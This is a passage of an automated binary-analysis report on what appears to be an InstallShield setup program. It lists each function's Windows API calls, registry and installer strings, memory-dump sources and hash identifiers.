                                                                                                                                                                            • Part of subcall function 00411D8B: __EH_prolog3_GS.LIBCMT ref: 00411D95
                                                                                                                                                                            • Part of subcall function 00411D8B: SysStringLen.OLEAUT32(?), ref: 00411EBB
                                                                                                                                                                            • Part of subcall function 00411D8B: SysFreeString.OLEAUT32(?), ref: 00411ECA
                                                                                                                                                                          Strings
                                                                                                                                                                          • HsG, xrefs: 0041CC30
                                                                                                                                                                          • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\, xrefs: 0041CBB3
                                                                                                                                                                          • UninstallString, xrefs: 0041CB9C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String$H_prolog3_$ErrorH_prolog3Last$Free$AllocQueryValue
                                                                                                                                                                          • String ID: HsG$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$UninstallString
                                                                                                                                                                          • API String ID: 1981213432-2364393352
                                                                                                                                                                          • Opcode ID: 98af843c057a2c20e139c9d9d388cdf564b2207942463d5bd646b59bbe1b7161
                                                                                                                                                                          • Instruction ID: 75b03b68a6d5dbdf8ba53f7cf621bce4b02718432cfc001af4b0a6a10f5c6841
                                                                                                                                                                          • Opcode Fuzzy Hash: 98af843c057a2c20e139c9d9d388cdf564b2207942463d5bd646b59bbe1b7161
                                                                                                                                                                          • Instruction Fuzzy Hash: 7081C230904258EEDB24D7A4CC51BEDBBB4AF15304F1080EEE449B7192DBB85F88DB65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0045C80A, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 185COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorH_prolog3_Last
                                                                                                                                                                          • String ID: HsG$HsG
                                                                                                                                                                          • API String ID: 1018228973-815662401
                                                                                                                                                                          • Opcode ID: ee583d198347ccbe1592abd6a1eec0c782ebb70b88abb32cd8d20eb8cbb0be38
                                                                                                                                                                          • Instruction ID: 33be434c9568f602cbcf9e8dbe85184908a8a27aa8889812b7e340e692e5aa65
                                                                                                                                                                          • Opcode Fuzzy Hash: ee583d198347ccbe1592abd6a1eec0c782ebb70b88abb32cd8d20eb8cbb0be38
                                                                                                                                                                          • Instruction Fuzzy Hash: 3C816571800258DEDB15EF64C885BED7BB4BF14304F5440EEEC49AB283DB789A89CB65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041CDF0, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 181COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0041CDFA
                                                                                                                                                                            • Part of subcall function 0041C5BD: RegOpenKeyExW.ADVAPI32(80000001,Software\InstallShield\ISWI\7.0\SetupExeLog,00000000,00000001,?), ref: 0041C5D7
                                                                                                                                                                            • Part of subcall function 0041C5BD: RegQueryValueExW.ADVAPI32(?,SetupLogFileName,00000000,00000000,0049F668,?), ref: 0041C5FD
                                                                                                                                                                            • Part of subcall function 0041C5BD: RegCloseKey.ADVAPI32(?), ref: 0041C618
                                                                                                                                                                            • Part of subcall function 004432A1: _malloc.LIBCMT ref: 004432B9
                                                                                                                                                                            • Part of subcall function 00433509: __EH_prolog3_GS.LIBCMT ref: 00433513
                                                                                                                                                                            • Part of subcall function 00433509: GetModuleFileNameW.KERNEL32(00000000,?,00000400,00483E18,?,00000001), ref: 00433674
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 0040F49C: __EH_prolog3.LIBCMT ref: 0040F4A3
                                                                                                                                                                            • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
                                                                                                                                                                            • Part of subcall function 0040F441: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 0040F468
                                                                                                                                                                            • Part of subcall function 0043F694: lstrlenW.KERNEL32(?,?,?,0043829B,004A43E0,?,004A4C7C,?,?,00411A37,00000000,00000001,0000044F,00000000,000008A8,0041C4B5), ref: 0043F69C
                                                                                                                                                                            • Part of subcall function 0043F694: lstrcpynW.KERNEL32(?,?,-00000001,?,0043829B,004A43E0,?,004A4C7C,?,?,00411A37,00000000,00000001,0000044F,00000000,000008A8), ref: 0043F6C0
                                                                                                                                                                            • Part of subcall function 0043F694: lstrcatW.KERNEL32(?,?), ref: 0043F6DD
                                                                                                                                                                            • Part of subcall function 0040C92C: __EH_prolog3_GS.LIBCMT ref: 0040C933
                                                                                                                                                                            • Part of subcall function 0040C92C: GetLastError.KERNEL32(00000038,00417D0B), ref: 0040C93A
                                                                                                                                                                            • Part of subcall function 0040C92C: SetLastError.KERNEL32(00000000), ref: 0040C990
                                                                                                                                                                            • Part of subcall function 0041D880: __EH_prolog3_GS.LIBCMT ref: 0041D88A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorH_prolog3_Last$String$AllocCloseFileH_prolog3ModuleNameOpenQueryValue_malloclstrcatlstrcpynlstrlen
                                                                                                                                                                          • String ID: /f1$HsG$Setup.iss
                                                                                                                                                                          • API String ID: 794928986-1143889655
                                                                                                                                                                          • Opcode ID: 2179c65d335882b8bdbb7f181efda49eda3235c96bf5943a62a695e8d2edfedb
                                                                                                                                                                          • Instruction ID: 52f2cdaafbab3f4e57d35ee59addb2edc2a2add5d7b7810f9ffae2bf7edaeff5
                                                                                                                                                                          • Opcode Fuzzy Hash: 2179c65d335882b8bdbb7f181efda49eda3235c96bf5943a62a695e8d2edfedb
                                                                                                                                                                          • Instruction Fuzzy Hash: AB819370A05348EEDB10EB64CD55BDEBB74AF16308F0040EEE40967691DB789F84CB9A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004119C2, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 171COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 004119CC
                                                                                                                                                                            • Part of subcall function 0042FDE6: __EH_prolog3.LIBCMT ref: 0042FDED
                                                                                                                                                                            • Part of subcall function 0042FE5D: GetVersionExW.KERNEL32(?,?,?), ref: 0042FE9A
                                                                                                                                                                            • Part of subcall function 0042FE5D: GetSystemInfo.KERNEL32(?,?,?), ref: 0042FEEC
                                                                                                                                                                            • Part of subcall function 004382A3: lstrlenW.KERNEL32(?,?,?,00411A37,00000000,00000001,0000044F,00000000,000008A8,0041C4B5,00000452,?,00000218,0041C6E4,?,0000043C), ref: 004382AC
                                                                                                                                                                            • Part of subcall function 004382A3: lstrcpyW.KERNEL32 ref: 004382D3
                                                                                                                                                                            • Part of subcall function 004382A3: lstrcpyW.KERNEL32 ref: 004382E1
                                                                                                                                                                            • Part of subcall function 004146A1: GetTempPathW.KERNEL32(?,?,00000000,00000000,?,?,00411A59,?,00000400,00000000,00000000,00000001,0000044F,00000000,000008A8,0041C4B5), ref: 004146C1
                                                                                                                                                                            • Part of subcall function 004146A1: SetErrorMode.KERNEL32(00008003,?,?,00411A59,?,00000400,00000000,00000000,00000001,0000044F,00000000,000008A8,0041C4B5,00000452,?,00000218), ref: 004146D0
                                                                                                                                                                            • Part of subcall function 004146A1: GetWindowsDirectoryW.KERNEL32(?,?,?,?,00411A59,?,00000400,00000000,00000000,00000001,0000044F,00000000,000008A8,0041C4B5,00000452,?), ref: 004146E7
                                                                                                                                                                            • Part of subcall function 004146A1: lstrcpyW.KERNEL32 ref: 00414704
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcpy$DirectoryErrorH_prolog3H_prolog3_InfoModePathSystemTempVersionWindowslstrlen
                                                                                                                                                                          • String ID: HsG$lMJ$|LJ
                                                                                                                                                                          • API String ID: 4123192341-2286947246
                                                                                                                                                                          • Opcode ID: 6d0dfd8c933f2ebb99794f0e3d2167ea6dc998e69e31fd077bd6e47e2ddd0c1c
                                                                                                                                                                          • Instruction ID: 2329b76a0ad797e8a88de90dfeb6bdc016727f732aeb8c916549b908db6809ea
                                                                                                                                                                          • Opcode Fuzzy Hash: 6d0dfd8c933f2ebb99794f0e3d2167ea6dc998e69e31fd077bd6e47e2ddd0c1c
                                                                                                                                                                          • Instruction Fuzzy Hash: B051E130B04204AADF14F7768C527AE76A56B95308F0440BFE546A72D2EFBC9E44CB9D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004308B7, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 159COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 004308C1
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004309D3
                                                                                                                                                                            • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3H_prolog3_Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                          • String ID: %.1f$HsG
                                                                                                                                                                          • API String ID: 843513741-789691752
                                                                                                                                                                          • Opcode ID: 8517874feb85c79b2bc2a4ccf0f88733c11ba0550492360db79bc318f8f870b1
                                                                                                                                                                          • Instruction ID: 24765d7470b0ed5bfd2bd1aeb9c1a169584b1c6aa5b2ba714c6492dc1a4e71f6
                                                                                                                                                                          • Opcode Fuzzy Hash: 8517874feb85c79b2bc2a4ccf0f88733c11ba0550492360db79bc318f8f870b1
                                                                                                                                                                          • Instruction Fuzzy Hash: C8616771E00228EBDB14DF60CC91BDDB7B4AB18304F5080EAE549A7282DBB49A84CF94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00455A92, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 152COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00455A99
                                                                                                                                                                            • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
                                                                                                                                                                            • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
                                                                                                                                                                            • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
                                                                                                                                                                            • Part of subcall function 00455724: __EH_prolog3_GS.LIBCMT ref: 0045572E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorH_prolog3Last$H_prolog3_
                                                                                                                                                                          • String ID: *.*$HsG$HsG
                                                                                                                                                                          • API String ID: 2324316964-2570185586
                                                                                                                                                                          • Opcode ID: b5a4451727ce0120002a8de41f6bab78d126c139e5228882f723892d5c6d0772
                                                                                                                                                                          • Instruction ID: 20cf7cebe4006c28618b9ea710d69c1bc9611516ea64d930a0b9afe3a5374ab6
                                                                                                                                                                          • Opcode Fuzzy Hash: b5a4451727ce0120002a8de41f6bab78d126c139e5228882f723892d5c6d0772
                                                                                                                                                                          • Instruction Fuzzy Hash: EA51CAB0910204EFDB00EFE9C5926EDBBB8AF15308F50415FFC056B292D7794A5987AA
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004306A8, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 139COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 004306B2
                                                                                                                                                                            • Part of subcall function 00416CC5: __EH_prolog3_GS.LIBCMT ref: 00416CCC
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 0041B2AF: __EH_prolog3_GS.LIBCMT ref: 0041B2B6
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3_$FreeString
                                                                                                                                                                          • String ID: %d $HsG$HsG
                                                                                                                                                                          • API String ID: 1274762985-377422403
                                                                                                                                                                          • Opcode ID: 61b992fb12384713a74388a4d7742c046b94b6ef53d9363b551fb90fd0e095ef
                                                                                                                                                                          • Instruction ID: 7a70a73f7f4ef59c1d85d60b502d4946bd6f5df12313505ce1b6543eed5b82fb
                                                                                                                                                                          • Opcode Fuzzy Hash: 61b992fb12384713a74388a4d7742c046b94b6ef53d9363b551fb90fd0e095ef
                                                                                                                                                                          • Instruction Fuzzy Hash: CC515E7190025CEADB10EBA4CC55BDEB7B8BF54304F5440AFE509B7182EBB85B48CBA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00436A70, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 139COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00436A7A
                                                                                                                                                                            • Part of subcall function 004352C7: __EH_prolog3_catch.LIBCMT ref: 004352CE
                                                                                                                                                                            • Part of subcall function 004352C7: lstrcmpW.KERNEL32(00000008,00483E18,?,?,00483E18,00000008,?,00000004,004374EE,Startup,Source,00000001,?,00000400,00000452), ref: 004352F6
                                                                                                                                                                            • Part of subcall function 004432A1: _malloc.LIBCMT ref: 004432B9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_H_prolog3_catch_malloclstrcmp
                                                                                                                                                                          • String ID: Creating setup dialog...$Startup$session.cpp
                                                                                                                                                                          • API String ID: 43970051-4223746603
                                                                                                                                                                          • Opcode ID: 3977b8220eeff80297cc7d0f9cb8b60aea7369490cb5a6814a124e873e3d95ce
                                                                                                                                                                          • Instruction ID: 3705f9e300d2379c01e5196789dacb2d5c3074fc69e31bb8ddc8666f9f3badcb
                                                                                                                                                                          • Opcode Fuzzy Hash: 3977b8220eeff80297cc7d0f9cb8b60aea7369490cb5a6814a124e873e3d95ce
                                                                                                                                                                          • Instruction Fuzzy Hash: 9B516E70A01218ABDB15EB61CC59BDDB7B8AB14304F4042EEE109B71D1EB785F84CF99
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0042F620, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0042F62A
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0042F6B0
                                                                                                                                                                          • SendMessageW.USER32 ref: 0042F6F7
                                                                                                                                                                            • Part of subcall function 00417579: __EH_prolog3_GS.LIBCMT ref: 00417583
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeH_prolog3_MessageSendString
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 2788794003-1835203436
                                                                                                                                                                          • Opcode ID: 94f50e6d8f92fa969d364990841f392c4675c5822ffff284fddaf107317d05c1
                                                                                                                                                                          • Instruction ID: b725feb4ec8d194e398a384c829926952ea281141b596d57439f454a1716253e
                                                                                                                                                                          • Opcode Fuzzy Hash: 94f50e6d8f92fa969d364990841f392c4675c5822ffff284fddaf107317d05c1
                                                                                                                                                                          • Instruction Fuzzy Hash: 00418A71900228EFEB14DBA4CC85BDEBB78BF45304F50406EE501B7292DB786A49CF69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00426001, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0042600B
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 00424E4C: __EH_prolog3_GS.LIBCMT ref: 00424E56
                                                                                                                                                                            • Part of subcall function 00424E4C: VariantChangeType.OLEAUT32(?,?,00000000,00000002), ref: 00424EA0
                                                                                                                                                                            • Part of subcall function 00424E4C: VariantClear.OLEAUT32(?), ref: 0042506F
                                                                                                                                                                          • _memset.LIBCMT ref: 004260D9
                                                                                                                                                                            • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
                                                                                                                                                                            • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 004036A0: GetLastError.KERNEL32(CC858012,?,?,?,?,004711A8,000000FF), ref: 004036E2
                                                                                                                                                                            • Part of subcall function 004036A0: SetLastError.KERNEL32(?,00000000,00000000,000000FF,?,?,?,?,004711A8,000000FF), ref: 0040373E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
